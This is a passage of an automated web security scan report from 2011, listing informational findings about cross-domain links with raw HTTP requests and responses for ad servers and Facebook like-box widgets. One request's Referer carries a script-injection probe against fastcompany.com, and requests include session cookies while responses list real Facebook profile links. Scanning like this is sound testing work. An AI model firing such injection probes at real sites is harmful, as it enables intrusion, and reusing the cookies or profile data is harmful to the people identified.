User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:13 GMT
Server: Apache/2
Vary: Host
Content-Length: 1964
Connection: close
Content-Type: application/x-javascript


   document.write('<div class="content"><div style="background:url(\'http://static.jobthread.com/files/site_images/727999/727999_popsci-jobs-widget.png\') no-repeat 0 0;height:24px;width:340px;"></div><div style="margin:5px;"> <a href="http://jobs.popsci.com/job/software-test-engineer-sdet-ii-macintosh-business-redmond-wa-microsoft-eab8e9e1c4/?d=1&amp;source=jobroll">Software Test Engineer (SDET) II-Maci...</a>
...[SNIP]...
<br style="margin-bottom:10px;"> <a href="http://jobs.popsci.com/job/mobile-developers-and-more-kik-waterloo-on-canada-kik-interactive-inc-7474aa5ec0/?d=1&amp;source=jobroll">Mobile Developers and More @Kik </a>
...[SNIP]...
<br style="margin-bottom:10px;"> <a href="http://jobs.popsci.com/job/senior-software-development-engineer-sde-issaquah-wa-microsoft-2e4880a8e2/?d=1&amp;source=jobroll">Senior Software Development Engineer ...</a>
...[SNIP]...
<div style="float:left;clear:none;width:150px;margin-top:5px;"><a href="http://jobs.popsci.com/">More Jobs</a>&nbsp;|&nbsp;<a href="http://jobs.popsci.com/post">Post a Job</a>
...[SNIP]...

11.44. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/1829737

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:47:58 GMT
Connection: close
Content-Length: 7028

<html><head><title>ATT_Potter_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...
<noscript>
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/go/334302974/direct;ai.235624236;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/CJCNTCINGABS/05_ABS_728x90_2011/ATT_Potter_70_728x90_v2.jpg?ver=1" width="728" height="90" />
...[SNIP]...
<span id="te-clearads-js-abs01cont19"><script type="text/javascript" src="http://choices.truste.com/ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90"></script>
...[SNIP]...

11.45. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/4245069

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /CNT/iview/334302974/direct/01/4245069?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: AA002=1311365777-4076437; MUID=360F843730F542A7A6E2E0ACB7BADB9D; ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3; ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 13:06:09 GMT
Connection: close
Content-Length: 7033

<html><head><title>ATT_NoImage_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0
...[SNIP]...
<noscript>
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/go/334302974/direct;ai.235623689;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/CJCNTCINGABS/05_ABS_728x90_2011/ATT_NoImage_70_728x90_v2.jpg?ver=1" width="728" height="90" />
...[SNIP]...
<span id="te-clearads-js-abs01cont19"><script type="text/javascript" src="http://choices.truste.com/ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90"></script>
...[SNIP]...

11.46. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.127.52
X-Cnection: close
Date: Mon, 12 Sep 2011 12:58:21 GMT
Content-Length: 13287

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pacokiuoficial" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275029_623408303_7363567_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274170_100000159617387_7658664_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273359_26311129_904709769_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rsarja" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41641_1069590167_8489_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000748617778" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275828_100000748617778_4321253_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275054_1053268063_4076276_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.47. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.182.118
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:09 GMT
Content-Length: 13284

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273359_26311129_904709769_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000748617778" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275828_100000748617778_4321253_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174518_1531397409_2783989_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pacokiuoficial" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275029_623408303_7363567_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/261029_1193179193_1591267711_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rsarja" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41641_1069590167_8489_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.48. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=15713980389&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.173.114
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:55 GMT
Content-Length: 13110

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/mtvuk" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276473_15713980389_4949022_q.jpg" alt="MTV UK" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/harelxzxz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100000420492434_4883101_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001127569306" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274302_100001127569306_7126373_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/273514_688287219_759274808_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1428567834" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273639_1428567834_6776024_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/368701_622901920_7741892_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002926155271" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/368744_100002926155271_726971645_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002946825529" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273629_100002946825529_753202112_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275192_100000023670259_694968752_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002563202396" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273576_100002563202396_4378978_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002671470911" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275817_100002671470911_1387734045_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.49. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpopsci&width=347&colorscheme=light&show_faces=true&stream=false&header=false&height=250 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.35.105
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:50 GMT
Content-Length: 13693

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/PopSci" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276448_60342206410_3098453_q.jpg" alt="Popular Science" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/dogunmola" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49874_100000581760599_7045671_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ILuvYoshi08" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275249_1179315915_1118970385_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/cole.harland" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274860_1395846706_6830114_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/tonumalsub" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173907_531132628_1512733_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nima.agri" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273467_100002510744967_3627332_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/preetivarma" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211763_100000473693390_4514483_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/mawar.kuning.41" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186063_100000334296599_7302850_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002104474986" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273483_100002104474986_318419503_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=670327677" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275820_670327677_1283854559_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/olatunbosun.jegede" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274707_1022928586_2474270_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1529403362" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23254_1529403362_4817_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002760544146" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275693_100002760544146_8386355_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.50. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.137.46
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:39 GMT
Content-Length: 12925

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
